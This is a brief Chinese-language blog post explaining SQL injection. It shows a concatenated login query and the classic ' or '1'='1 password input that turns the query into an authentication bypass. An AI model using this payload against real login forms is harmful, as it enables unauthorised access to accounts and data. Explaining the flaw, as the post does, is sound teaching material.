SQL Injection

      在〈SQL Injection〉中尚無留言

登入時, 可以使用SQL 語法

select * from table where db_account=’$txtAccount’ and db_password=’$txtPassword’

在txtPassword輸入如下密碼 : ‘ or ‘1’=’1

所以SQL語法就變成如下
select * from table where db_account=’$txtAccount’ and db_password=’aaa’ or ‘1’=’1′

粉好, 入侵惹

發佈留言